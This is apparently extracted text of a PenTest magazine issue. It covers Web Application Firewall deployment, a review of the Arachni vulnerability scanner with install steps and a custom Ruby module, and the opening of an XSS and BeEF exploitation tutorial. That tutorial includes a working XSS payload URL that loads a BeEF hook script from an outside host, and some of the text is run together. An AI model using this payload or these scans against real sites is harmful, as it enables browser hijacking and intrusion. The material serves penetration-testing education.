In order to protect the web applications, the WAF filters the data flow between the browser and the web application. If an entry pattern emerges that is defined as invalid, the WAF interrupts the data transfer or reacts in another way predefined in its configuration. If, for example, two parameters have been defined for a monitored entry form, the WAF can block all requests that contain three or more parameters. The length and the contents of parameters can be checked in the same way. Many attacks can be prevented, or at least made more difficult, just by specifying general rules about parameter quality, such as the maximum length, the valid characters and the permitted value range.
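Parameter rules of this kind – expected parameter set, maximum length and permitted characters – can be sketched as follows (a hypothetical rule table, not any vendor's configuration syntax):

```python
import re

# Hypothetical whitelist rules for one form: parameter name ->
# (maximum length, regex describing the permitted characters).
RULES = {
    "customer_id": (10, re.compile(r"^[0-9]+$")),
    "quantity":    (3,  re.compile(r"^[0-9]+$")),
}

def check_request(params: dict) -> bool:
    """Reject requests with unexpected, oversized or malformed parameters."""
    if set(params) != set(RULES):          # e.g. a third, injected parameter
        return False
    for name, value in params.items():
        max_len, pattern = RULES[name]
        if len(value) > max_len or not pattern.match(value):
            return False
    return True

assert check_request({"customer_id": "1042", "quantity": "2"})
# A third parameter, or a non-numeric value, is blocked outright:
assert not check_request({"customer_id": "1042", "quantity": "2", "debug": "1"})
assert not check_request({"customer_id": "1 OR 1=1", "quantity": "2"})
```

The attraction of such generic rules is that they block whole classes of attacks without knowing any specific exploit.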
Of course, an integrated XML firewall should also be standard these days, because more and more web applications are based on XML. This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning. A fully developed rule set for access numbers, with finely adjustable guidelines, also eliminates the negative consequences of Denial of Service or Brute Force attacks. Furthermore, every file that is uploaded to the web application can represent a danger if it contains a virus, worm, Trojan or similar; a virus scanner integrated into the WAF checks every file before it is passed to the web application.
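The access-number rules mentioned for Denial of Service and Brute Force protection boil down to rate limiting. A minimal sliding-window sketch (thresholds are invented for illustration):

```python
from collections import deque

class RateLimiter:
    """Allow at most max_requests per client within window_seconds."""
    def __init__(self, max_requests=5, window_seconds=60):
        self.max_requests = max_requests
        self.window = window_seconds
        self.hits = {}  # client -> deque of request timestamps

    def allow(self, client: str, now: float) -> bool:
        q = self.hits.setdefault(client, deque())
        while q and now - q[0] >= self.window:  # drop expired entries
            q.popleft()
        if len(q) >= self.max_requests:
            return False  # e.g. a brute-force login attempt
        q.append(now)
        return True

rl = RateLimiter(max_requests=3, window_seconds=60)
assert all(rl.allow("10.0.0.1", t) for t in (0, 1, 2))
assert not rl.allow("10.0.0.1", 3)   # fourth hit inside the window
assert rl.allow("10.0.0.1", 61)      # window has slid past the first hits
```

Real WAFs apply such counters per URL, per session or per source address, with the finely adjustable guidelines the article mentions.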
Figure 2: An overview of how a Web Application Firewall works.
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn its nature. In this way these filters can – to a certain extent – automatically prevent malicious code from reaching the browser, for example if a web application does not check the original data sufficiently. Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters. In practice, however, a whitelist-only approach is quite cumbersome, requiring constant re-learning whenever the application changes; it quickly becomes outdated due to the constant tuning required to maintain the whitelist profiles. The contrary blacklist-only approach, on the other hand, offers attackers too many loopholes. Consequently, the ideal solution relies on a combination of whitelisting and blacklisting. This can be made easy to use with templated negative security profiles (e.g. for standard applications like Outlook Web Access, SharePoint or Oracle applications), augmented by a whitelist for high-value sub-sections like an order entry page.
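A combined whitelist/blacklist decision might be sketched like this (both rule sets are invented for illustration): the blacklist acts as the negative security profile everywhere, while a high-value sub-section such as an order entry page is governed by its own strict whitelist.

```python
import re

# Hypothetical rule sets for illustration only.
BLACKLIST = [re.compile(p, re.I) for p in (r"<script", r"union\s+select")]
# High-value sub-section protected by a whitelist profile:
ORDER_PARAM = re.compile(r"^[0-9]{1,6}$")  # only short numeric item IDs

def is_allowed(path: str, value: str) -> bool:
    if path.startswith("/order/"):
        # The whitelist decides alone for the order-entry pages.
        return bool(ORDER_PARAM.match(value))
    # Everywhere else the negative security profile (blacklist) applies.
    return not any(p.search(value) for p in BLACKLIST)

assert is_allowed("/search", "blue shoes")
assert not is_allowed("/search", "1 UNION SELECT password FROM users")
assert is_allowed("/order/item", "1042")
assert not is_allowed("/order/item", "1042; DROP TABLE orders")
```

The whitelist only needs re-learning for the small, high-value section, while the templated blacklist covers the rest of the application.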
To prevent a high number of false positives, some manufacturers provide an exception profiler. This flags to the administrator entries that possibly violate the policies but, based on an extensive heuristic analysis, can still be categorized as legitimate. At the same time, the exception profiler suggests exemption clauses that prevent a similar false positive from being repeated.
Some WAFs provide different operating modes: Bridge Mode (as Bridge Path) or Proxy Mode (as One-Arm Proxy or Full Reverse Proxy). In Bridge Mode the WAF is used as an in-line Bridge Path and works with the same address for the virtual IP and the backend server. Although this configuration avoids changes to the existing network structure, and as such can be integrated very easily and quickly to protect an endangered web application, Bridge Mode deployments sacrifice security and application acceleration for network simplicity. Additionally, in this mode all data is passed on to the web application, including potential attacks – even if the security checks have been conducted.

The by far safer operating mode for a WAF is the Full Reverse Proxy configuration, as it sits in line and uses both of the system's physical ports (WAN and LAN). As a proxy, the WAF can protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery, which is not possible in Bridge Mode. Special functions are only available in this mode: as a Full Reverse Proxy, a WAF provides for example Instant SSL, which converts HTTP pages into HTTPS without changes to the code.
Proxy WAFs also provide a whole range of further security functions. They facilitate the translation of web addresses, and as such the rewriting of the URLs used by public requests into the web application's hidden URL. This means that the application's actual web address remains cloaked. With Proxy WAFs, SSL handling is much faster and the response times of the web application can also be improved. They also facilitate cloaking techniques, Layer 7 rules (to ward off Denial of Service attacks) as well as authentication and authorization. Cloaking, the concealment of one's own IT infrastructure, is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey. By masking outgoing data, protection can be obtained against data theft, and cookie security prevents identity theft. But Proxy WAFs must also be configured accordingly; penetration tests help with the correct configuration.

Figure 3: A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult.
Demands on Penetration Testers
When penetration testers look for weak spots, they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 2.0. This defines rules for transmitting and storing Primary Account Number (PAN) information. Companies are required to develop secure web applications and maintain them constantly. Further points define formal risk checks and test processes that are intended to uncover high-risk weak spots. In order to check whether systems comply with PCI DSS, penetration testers must heed the following requirements:
• Does the system have a Web Application Firewall?
• Does the web traffic pass through a WAF proxy function?
• Are the web servers shielded against direct access by attackers?
• Is there SSL encryption for the data traffic, even if the application or the server does not support it?
• Are all known and unknown threats blocked?
A further point is protection against data theft. This involves checking whether the protection mechanism inspects the outgoing data traffic for the possible exfiltration of sensitive data and then stops it.
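Such an outgoing check for PAN data can be sketched with a card-number pattern plus a Luhn checksum (illustrative only; real WAFs use considerably more robust detection):

```python
import re

CARD_RE = re.compile(r"\b(?:\d[ -]?){13,16}\b")

def luhn_valid(number: str) -> bool:
    """Standard Luhn checksum over the digits of a candidate card number."""
    digits = [int(d) for d in number if d.isdigit()]
    checksum = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        checksum += d
    return checksum % 10 == 0

def leaks_pan(response_body: str) -> bool:
    """Flag outgoing responses that appear to contain a valid card number."""
    return any(luhn_valid(m.group()) for m in CARD_RE.finditer(response_body))

# 4111111111111111 is the classic Luhn-valid Visa test number.
assert leaks_pan("card: 4111 1111 1111 1111")
assert not leaks_pan("order id 1234567890123456")  # fails the Luhn check
```

A WAF applying this kind of outbound rule can block or mask the response before the PAN ever leaves the server, which is exactly what the PCI DSS check above looks for.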
Penetration testers can fall back on web scanners to run security checks on web applications. Several WAFs provide extra interfaces to automate such tests.
Since, by its very nature, a WAF stands on the front line, certain test criteria should be applied to it as well. These include in particular identity and access management, where the principle of least privilege applies: users are only awarded those privileges they need for their work or for the use of the web application; all other privileges are blocked. A general integration of the WAF with Active Directory, eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier.
The user interface is also an especially critical point, because it is the basis for safe WAF configuration. Unintelligible or poorly structured user interfaces lead to incorrect settings, which cancel out the protective functions. If, by contrast, the functions can be grasped intuitively and are clearly displayed, easy to understand and easy to set, then in practice this makes the greatest contribution to system security. A further plus is a user interface that is identical across several of the manufacturer's products or, even better, a management center which administrators can use to manage numerous other network and security products alongside the WAF. The administrators can then rely on familiar configuration processes for security clusters, which ensures that security configurations for each cluster are consistent across the organization. An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account in the evaluation, along with the consistency of the security deployment across applications and sites.
In summary, any web application, old or new, needs to be secured by a WAF in Full Proxy Mode. Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place. They should also check whether it prevents the hacking of the application itself with common or new means, whether it secures all the backend systems the application connects to, and whether it stops leakage of sensitive data where the web application has weaknesses which the WAF cannot level out. If penetration testers are not only looking for a security snapshot but want to help their customers create sustainable security, they should always include the WAF's administration in their assessment.
OLIVER WAI
Oliver Wai leads product marketing for Barracuda's line of Web application security and application delivery products. In his role, Oliver is a core member of Barracuda's security incident response team and writes frequently about the latest application security threats. Prior to Barracuda Networks, Oliver held positions at Google, Integration Appliance and Brocade Communications. Oliver has an MS in Management Science & Engineering from Stanford University and a BS (Cum Laude) in Computer Engineering from Santa Clara University.
In the upcoming issue of the PenTest magazine:

• Web Session Management
• Password management in code
• ETHical Ghosts on SF1
• Preservation, namely in the online gambling industry
• Cyber Security War

Available to download on December 22nd.

If you would like to contact the PenTest team, just send an email to en@pentestmag.com. We will reply as soon as possible.
WEB APP VULNERABILITIES
Pulling the Legs of Arachni
Arachni is a fire-and-forget (or point-and-shoot) web application vulnerability scanner developed in Ruby by Tasos "Zapotek" Laskos. It got quite a good score for the detection of Cross-Site Scripting and SQL Injection issues in the recently publicised vulnerability scanner benchmark by Shay Chen.

Arachni is not a so-called inspection proxy such as the popular commercial but low-cost Burp Suite or the freeware Zed Attack Proxy of the Open Web Application Security Project (OWASP). Those tools are really meant to be used by a skilled consultant doing manual investigations of the application. Arachni can better be compared with commercial online scanners, which are pointed at the application and produce a report with no further interaction from the user.

Every security consultant or hacker must understand the strengths and weaknesses of his or her toolset and must choose the best combination of tools for the job at hand. Is Arachni worthwhile? Time for an in-depth review.

Under the Hood
According to the documentation, Arachni offers the following:

• Simplicity: everything is simple and straightforward, from a user's or component developer's point of view.
• A stable, efficient and high-performance framework: Arachni allows custom modules, reports and plug-ins, and developers can easily use the advanced framework features without knowing the nitty-gritty details.
Table 1: Overview of the audit and reconnaissance modules included with Arachni.

Audit modules:
• SQL injection
• Blind SQL injection using rDiff analysis
• Blind SQL injection using timing attacks
• CSRF detection
• Code injection (PHP, Ruby, Python, JSP, ASP.NET)
• Blind code injection using timing attacks (PHP, Ruby, Python, JSP, ASP.NET)
• LDAP injection
• Path traversal
• Response splitting
• OS command injection (*nix, Windows)
• Blind OS command injection using timing attacks (*nix, Windows)
• Remote file inclusion
• Unvalidated redirects
• XPath injection
• Path XSS
• URI XSS
• XSS
• XSS in event attributes of HTML elements
• XSS in HTML tags
• XSS in HTML script tags

Recon modules:
• Allowed HTTP methods
• Back-up files
• Common directories
• Common files
• HTTP PUT
• Insufficient Transport Layer Protection for password forms
• WebDAV detection
• HTTP TRACE detection
• Credit card number disclosure
• CVS/SVN user disclosure
• Private IP address disclosure
• Common backdoors
• .htaccess LIMIT misconfiguration
• Interesting responses
• HTML object grepper
• E-mail address disclosure
• US Social Security Number disclosure
• Forceful directory listing
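Several of the audit modules above work with timing attacks. The underlying idea, comparing the response time of a sleep-inducing payload against a baseline request, can be sketched as follows (the `vulnerable_app` function simulates a web application instead of doing real HTTP; all names are hypothetical):

```python
import time

def vulnerable_app(query: str) -> str:
    """Simulated web application: an injected SLEEP delays the response."""
    if "SLEEP(1)" in query:
        time.sleep(1.0)
    return "ok"

def blind_timing_check(send, payload: str, threshold: float = 0.5) -> bool:
    """Flag an input as injectable if the payload slows the response
    well beyond the baseline request."""
    t0 = time.monotonic()
    send("id=1")                      # baseline request
    baseline = time.monotonic() - t0
    t0 = time.monotonic()
    send(payload)                     # request carrying the timing payload
    delayed = time.monotonic() - t0
    return delayed - baseline > threshold

assert blind_timing_check(vulnerable_app, "id=1 AND SLEEP(1)")
assert not blind_timing_check(vulnerable_app, "id=1")
```

Blind detection of this kind needs no visible error output, which is why the timing variants appear alongside the regular injection modules.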
talks to one or more dispatchers that will perform the scanning job New in the latest experimental branch is that dispatchers can communicate with each other and share the load (the Grid)
This is great if you want to speed up the scan or if you want to execute some crazy things like running
We can vouch that both simplicity and performance goals have been attained by Arachni Since the framework is still under heavy development stability is sometimes lacking but at no time this interfered with our vulnerability assessments
Arachni is highly modular both from an architecture point of view as a source code point of view The Arachni client (web or command-line) connects to one or more dispatchers that will execute the scan The connection to these dispatchers can be secured by SSL encryption and cert based authentication One dispatcher can handle multiple clients Multiple dispatchers can share a load and communicate with each other to optimise and speed-up the scanning process
The asynchronous scanning engine supports both HTTP and HTTPS and has pauseresume functionality Arachni supports upstream proxies (for SOCKS4 SOCKS4A SOCKS5 HTTP11 and HTTP10) as well as proxy authentication
The scanner can authenticate versus the web application using form-based authentication HTTP Basic and Digest Authentication and NTLM
At the start of every scan a crawler will try to detect all pages In version 03 this was optional but since version 04 the crawler will always be run at the start of the scan This crawler has filters for redundant pages based on regular expressions and counters and can include or exclude URLs based on regular expressions Optionally the crawler can also follow subdomains There is also an adjustable link count and redirect limit
The HTML parser can extract forms links cookies and headers It can graciously handle badly written HTML due to a combination of regular expression analysis and the Nokogiri HTML parser
Arachni offers a very simple and easy to use module API enabling a developer to access helper audit methods and writing custom modules in a matter of minutes Arachni already includes a large number of modules audit modules and reconnaissance (recon) modules Table 1 provides an overview
Arachni offers report management The following reports can be created standard output HTML XML TXT YAML serialization and the Metareport providing Metasploit integration for automated and assisted exploitation
Arachni has many build-in plug-ins that have direct access to the framework instance Plug-ins can be used to add any functionality to Arachni Table 2 provides an overview of currently available plug-ins
InstallationArachni consists of client-side (web or shell) and server-side functionality (the dispatchers) A client
Table 2 Included Arachni plug-ins Plug-ins have direct access to the framework instance and can be used to add any functionality to Arachni
Plug-insPassive Proxy Analyses requests and responses
between the web application and the browser assisting in AJAX audits logging-in andor restricting the scope of the audit
Form based AutoLogin Performs an automated login
Dictionary attacker Performs dictionary attacks against HTTP Authentication and Forms based authentication
Proler Performs taint analysis with benign inputs and response time analysis
Cookie collector Keeps track of cookies while establishing a timeline of the changes
Healthmap Generates a sitemap showing the health (vulnerability present or not) of each crawledaudited URL
Content-types Logs content-types of server responses aiding in the identication of interesting (possibly leaked) les
WAF (Web Application Firewall) Detector
Establishes a baseline of normal behaviour and uses rDiff analysis to determine if malicious inputs cause any behavioural changes
Metamodules Loads and runs high-level meta-analysis modules premidpost-scanAutoThrottle Dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilizationTimeoutNotice Provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with It also points out the danger of DOS (Denail-of-Service) attacks against pages that perform heavy-duty processingUniformity Reports inputs that are uniformly vulnerable across a number of pages hinting to the lack of a central point of input sanitization
WEB APP VULNERABILITIES
Page 24 httppentestmagcom012011 (1) November Page 25 httppentestmagcom012011 (1) November
You can even run your dispatchers in multiple geographic zones, thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers.
Let's get our hands dirty and start with the experimental branch (currently at version 0.4), so we can work with the latest and greatest functionality. Another benefit is that this experimental version can work under Windows.
Installation under Linux is quick and easy, but a Windows set-up requires the installation of Cygwin first. Cygwin is a collection of tools that provide a Linux-like environment on Windows, as well as providing a large part of the Linux APIs. Another possibility is to run it natively on Windows using MinGW (Minimalist GNU for Windows), but at this moment there are too many problems involved with that.
Linux
Installation under Linux is quite straightforward. Open your favourite shell and execute the commands in Listing 1.
This will install all source directories in your home directory. Change the cd commands if you want the sources somewhere else. In case you need an update to the latest versions, just cd into the three directories above and perform:
$ git pull
$ rake install
Now you can hack the source code locally and play around with Arachni. If you encounter a Typhoeus-related error while running Arachni, issue:
$ gem clean
Windows
Arachni comes with decent documentation, but I had a chuckle when I read the installation instructions for Windows: Windows users should run Arachni in Cygwin. I knew that this was not going to be a smooth ride. Since v0.3 some changes have been made to the experimental version to make it easier, so here we go.
Please note that these installation instructions start with the installation of Cygwin and all required dependencies.
Install or upgrade Cygwin by running setup.exe. Apart from the standard packages, include the following:
• Database: libsqlite3-devel, libsqlite3_0
• Devel: doxygen, libffi4, gcc4, gcc4-core, gcc4-g++, git, libxml2, libxml2-devel, make, openssl-devel
• Editors: nano
• Libs: libxslt, libxslt-devel, libopenssl098, tcltk, libxml2, libmpfr4
• Net: libcurl-devel, libcurl4
Listing 1. Installation for Linux
$ sudo apt-get install libxml2-dev libxslt1-dev libcurl4-openssl-dev libsqlite3-dev
$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install
Listing 2. Installation for Windows
$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install
Accept the installation of packages that are required to satisfy dependencies. Note that some of your other tools might not work with these libraries or upgrades. In any case, an upgrade of Cygwin usually results in recompiling any tools that you compiled earlier.
Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand. First we need to install libffi. Execute the following commands in your Cygwin shell:
$ cd
$ git clone http://github.com/atgreen/libffi.git
$ cd libffi
$ ./configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml. Download the latest stable version of libyaml (currently 0.1.4) from http://pyyaml.org/wiki/LibYAML and move it to your Cygwin home folder (probably C:\cygwin\home\your_windows_id). Execute the following:
$ cd
$ tar xvf yaml-0.1.4.tar.gz
$ cd yaml-0.1.4
$ ./configure
$ make
$ make install
Now we need to compile and install Ruby. Download the latest stable release of Ruby (currently ruby-1.9.2-p290.tar.gz) from http://www.ruby-lang.org and move it to your Cygwin home folder. Execute the following commands in the Cygwin shell:
$ cd
$ tar xvf ruby-1.9.2-p290.tar.gz
$ cd ruby-1.9.2-p290
$ ./configure
$ make
$ make install
From your Cygwin shell, update and install some necessary modules:
$ gem update --system
$ gem install rake-compiler
$ cd
$ git clone http://github.com/djberg96/sys-proctable.git
$ cd sys-proctable
$ gem build sys-proctable.gemspec
$ gem install sys-proctable-0.9.1-x86-cygwin.gem
Finally, we can install Arachni (and the source) by executing the commands in Listing 2 in the Cygwin shell (note: these are the same commands as with the Linux installation).
In case of weird error messages (especially on Vista systems) regarding fork during compilation, execute the following in your Cygwin shell:
$ find /usr/local -iname '*.so' > /tmp/localso.lst
Quit all Cygwin shells. Use Windows to browse to C:\cygwin\bin. Right-click ash.exe and choose Run as administrator. Enter in ash:
$ /bin/rebaseall
$ /bin/rebaseall -T /tmp/localso.lst
Exit ash
Light my Fire
How to fire up Arachni depends on whether you want to use it with the new (since version 0.3) web GUI or simply run everything through the command-line interface. Note that the current web GUI does not support all functionality that is available from the command-line.
The GUI can be started by executing the following commands:
$ arachni_rpcd &
$ arachni_web
After that, browse to http://localhost:4567 and admire the new GUI. You will need to attach the GUI to one or more dispatchers. The dispatcher(s) will run the actual scan.
Figure 1. Edit Dispatchers
If you want to use the command-line interface, just execute:
$ arachni --help
A quick overview of the other screens (Figure 1):
• Start a Scan: start a scan by entering the URL and pressing Launch scan. After a scan is launched, the screen gives an overview of what issues are detected and how far the process is.
• Modules: enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site Scripting (XSS), SQL Injection (SQLi) and Cross-Site Request Forgery (CSRF), detect hidden features, or simply make lists of interesting items such as email addresses.
• Plugins: plug-ins help to automate tasks. Plug-ins are more powerful than modules and make it possible to script login sequences, detect Web Application Firewalls (WAF), perform dictionary attacks, …
• Settings: the settings screen allows you to add cookies and headers, limit the scan to certain directories, …
• Reports: gives access to the scan reports. Arachni creates reports in its own internal format and exports them to HTML, XML or text.
• Add-ons: three add-ons are installed:
  • Auto-deploy: converts any SSH-enabled Linux box into an Arachni dispatcher.
  • Tutorial: serves as an example.
  • Scheduler: schedules and runs scan jobs at a specific time.
• Log: overview of actions taken by the GUI.
Your First Scan
We will use both the command-line and the GUI. First the command-line: start a scan with all modules active. This is extremely easy:
$ arachni http://www.example.com --report=afr:outfile=www.example.com.afr
Afterwards, the HTML report can be created by executing the following:
$ arachni --repload=www.example.com.afr --report=html:outfile=www.example.com.html
That's it! Enabling or disabling modules is of course possible. Execute the following command for more information about the possibilities of the command-line interface:
$ arachni --help
Usually it is not necessary to include all recon modules. Some modules will create a lot of requests, making detection of your activities easier (if that is a problem with your assignment) and taking a lot more time to finish. List all modules with the following command:
$ arachni --lsmod
Enabling or disabling modules is easy: use the --mods switch followed by a regular expression to include modules, or exclude modules by prefixing the regular expression with a dash. Example:
$ arachni --mods=*,-xss_* http://www.example.com
The above will load all modules except the modules related to Cross-Site Scripting (XSS).
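Conceptually, the include/exclude matching behaves like the following Ruby sketch. The helper name, the glob-to-regex shortcut and the module names are illustrative assumptions, not Arachni's actual code.

```ruby
# Hypothetical sketch of --mods style include/exclude filtering;
# patterns starting with '-' exclude, everything else includes.
def select_modules( all_mods, patterns )
  includes, excludes = patterns.partition { |p| !p.start_with?( '-' ) }
  excludes = excludes.map { |p| p[1..-1] }   # strip the leading dash
  to_re = lambda { |p| Regexp.new( p == '*' ? '.*' : p ) }

  picked = all_mods.select { |m| includes.any? { |p| m =~ to_re.call( p ) } }
  picked.reject { |m| excludes.any? { |p| m =~ to_re.call( p ) } }
end

mods = [ 'xss_event', 'xss_path', 'sqli', 'csrf' ]
select_modules( mods, [ '*', '-xss_*' ] )  # => ["sqli", "csrf"]
```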
Using the GUI makes this process even easier. Open the GUI by browsing to http://localhost:4567 and accept the default dispatcher.
The next steps are to verify the settings in the Settings, Modules and Plugins screens. Once you are satisfied, proceed to the Start a Scan screen.
If you want to run a scan against some test applications, visit my blog for a list of deliberately vulnerable applications. Most of these applications can be installed locally or can be attacked online (please read all related FAQs and permissions before scanning a site; in most jurisdictions this is illegal unless permission is explicitly granted by the owner).
After the scan, just go to the Reports screen and download the report in the format you want.

Figure 2. Start a Scan screen
Listing 3. Create your own module
=begin
  Arachni
  Copyright (c) 2010-2011 Tasos "Zapotek" Laskos <tasos.laskos@gmail.com>

  This is free software; you can copy, distribute and modify
  this program under the terms of the GPL v2.0 License
  (See LICENSE file for details)
=end

module Arachni
module Modules

#
# Looks for common files on the server, based on wordlists
# generated from open source repositories.
#
# More information about the SVNDigger wordlists:
# http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing
#
# The SVNDigger word lists were released under the GPL v3.0 License.
#
# @author Herman Stevens
# @see http://cwe.mitre.org/data/definitions/538.html
#
class SvnDiggerDirs < Arachni::Module::Base

    def initialize( page )
        super( page )
    end

    def prepare
        # to keep track of the requests and not repeat them
        @@__audited ||= Set.new

        @@__directories ||= []
        return if !@@__directories.empty?

        read_file( 'all-dirs.txt' ) {
            |file|
            @@__directories << file unless file.include?( '?' )
        }
    end

    def run
        path = get_path( page.url )
        return if @@__audited.include?( path )

        print_status( 'Scanning SVNDigger Dirs...' )

        @@__directories.each {
            |dirname|
            url = path + dirname + '/'
            print_status( "Checking for #{url}" )

            log_remote_directory_if_exists( url ) {
                |res|
                print_ok( "Found #{dirname} at " + res.effective_url )
            }
        }

        @@__audited << path
    end

    def self.info
        {
            :name        => 'SVNDigger Dirs',
            :description => %q{Finds directories, based on wordlists
                created from open source repositories. The wordlist
                utilized by this module is vast and will add a
                considerable amount of time to the overall scan time.},
            :author      => 'Herman Stevens <herman.stevens@gmail.com>',
            :version     => '0.1',
            :references  => {
                'Mavituna Security' => 'http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing',
                'OWASP Testing Guide' => 'https://www.owasp.org/index.php/Testing_for_Old,_Backup_and_Unreferenced_Files_(OWASP-CM-006)'
            },
            :targets     => { 'Generic' => 'all' },
            :issue       => {
                :name            => %q{A SVNDigger directory was detected.},
                :description     => %q{},
                :tags            => [ 'svndigger', 'path', 'directory', 'discovery' ],
                :cwe             => '538',
                :severity        => Issue::Severity::INFORMATIONAL,
                :cvssv2          => '',
                :remedy_guidance => %q{Review these resources manually.
                    Check if unauthorized interfaces are exposed
                    or confidential information.},
                :remedy_code     => ''
            }
        }
    end

end
end
end
Create your Own Module
Arachni is very modular and can be easily extended. In the following example we create a new reconnaissance module.
Move into your Arachni source tree. You'll find the modules directory; in there you'll find two directories: audit and recon. Move into the recon directory, where we will create our Ruby module.
Arachni makes it really easy: if your module needs external files, it will search in a subdirectory with the same name. Example: if you create a svn_digger_dirs.rb module, this module is able to find external files in the modules/recon/svn_digger_dirs subdirectory.
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing. These wordlists are based on directories found in open source code repositories.
If there is a directory that needed to be protected and you forgot to do so, it will be found by a scanner that uses these wordlists.
Furthermore, it can be used as a basis for reconnaissance: if a directory or file is detected, this might provide clues about what technology the site is using.
Download the wordlists from the above URL. Create a directory modules/recon/svn_digger_dirs and move the file all-dirs.txt from the wordlist archive to the newly created directory.
Create a copy of the file modules/recon/common_directories.rb and name it svn_digger_dirs.rb. Change the code to read as follows: Listing 3.
The code does not need a lot of explanation: it will check whether or not a specific directory exists; if yes, it will forward the name to the Arachni Trainer (which will include the directory in the further scans) as well as create a report entry for it.
Note: the above code, as well as another module based on the SVNDigger wordlists with filenames, is now part of the experimental Arachni code base.
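The existence check at the heart of such a forced-browsing module boils down to requesting each candidate path and treating a non-error response as a hit. The following Ruby sketch illustrates that idea; the function and the injected fetcher lambda are illustrative assumptions standing in for the framework's asynchronous HTTP client, not Arachni's real helper.

```ruby
# Illustrative sketch of a forced-browsing existence check; `fetcher`
# stands in for an HTTP client and returns the status code of a GET.
def directory_exists?( base, dirname, fetcher )
  url = base.chomp( '/' ) + '/' + dirname + '/'
  status = fetcher.call( url )
  status >= 200 && status < 400   # 2xx/3xx: treat the directory as present
end

# Pretend the server only knows about /admin/:
fetcher = lambda { |url| url.end_with?( '/admin/' ) ? 200 : 404 }
directory_exists?( 'http://example.com', 'admin',  fetcher )  # => true
directory_exists?( 'http://example.com', 'backup', fetcher )  # => false
```

Real scanners also fingerprint custom 404 pages, since some servers answer 200 for every path; that refinement is omitted here.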
Conclusion
We used Arachni in many of our application vulnerability assessments. The good points are:
• Highly scalable architecture: just create more servers with dispatchers and share the load. This makes the scanner a lot more responsive and fast.
• Highly extensible: create your own modules, plug-ins and even reports with ease.
• User-friendly: start your scan in minutes.
• Very good XSS and SQLi detection with very few false positives. There are false negatives, but this is usually caused by Arachni not detecting the links to be audited. This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy.
• Excellent reporting capabilities, with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE).
Arachni lacks support for the following:
• No AJAX and JSON support
• No JavaScript support
This means that you need to help Arachni find links hidden in JavaScript, e.g. by using it as a proxy between your browser and the web application. You'll need a different tool (or use your brain and manual tests) to check for AJAX/JSON-related vulnerabilities in the application you are testing.
Arachni also cannot examine and decompile Flash components, but a lot of tools are at hand to help you with that. Arachni does not perform WAF (Web Application Firewall) evasion, but then again, this is not necessarily difficult to do manually for a skilled consultant or hacker.
And why not write your own module or plug-in that implements the missing functionality? Arachni is certainly a tool worth adding to your toolkit.
HERMAN STEVENS
After a career of 15 years spanning many roles (developer, security product trainer, information security consultant, Payment Card Industry auditor, application security consultant), Herman Stevens now works and lives in Singapore, where he is the director of his company, Astyran Pte Ltd (http://www.astyran.com). Astyran specialises in application security, such as penetration tests, vulnerability assessments, secure code reviews, awareness training and security in the SDLC. Contact Herman through email (hermanstevens@gmail.com) or visit his blog (http://blog.astyran.sg).
In most commercial penetration testing reports it's sufficient to just show a small alert popup: this demonstrates that a particular parameter is vulnerable to an XSS attack. However, this is not how an attacker would function in the real world. Sure, he'd use a pop-up initially to find out which parameter is vulnerable to an XSS attack. Once he's identified that, though, he'll look to steal information by executing malicious JavaScript, or even gain total control of the user's machine.
In this article we'll look at how an attacker can gain complete control over a user's browser, ultimately taking over the user's machine, by using BeEF (a browser exploitation framework).
A Simple POC
To start off though, let's do exactly what the attacker would do, which is to identify a vulnerability. For simplicity's sake we'll assume that the attacker has already identified a vulnerable parameter on a page. Here are the relevant files, which you can use on your own web server if you want to try this.
HTML Page:
<HTML>
<BODY>
<FORM NAME="test" action="search1.php" method="GET">
Search: <INPUT TYPE="text" name="search">
<INPUT TYPE="submit" name="Submit" value="Submit">
</FORM>
</BODY>
</HTML>
XSS – BeEF – Metasploit Exploitation
Figure 2. BeEF after configuration
Cross-Site Scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code in the victim's browser. The impact of an XSS attack is only limited by the potency of the attacker's JavaScript code.
Figure 1. User input in a search box
and click a few buttons to configure it. Alternatively, you could use a distribution like BackTrack, which already has BeEF installed. Here is a screenshot of how BeEF looks after it is configured (Figure 2).
Instead of clicking on a link which will generate a popup box, the user will instead be tricked into clicking on a link which tells his browser to connect to the BeEF controller. The URL that the user has to click on is:
http://localhost/search1.php?search=<script src='http://192.168.56.101/beef/hook/beefmagic.js.php'></script>&Submit=Submit
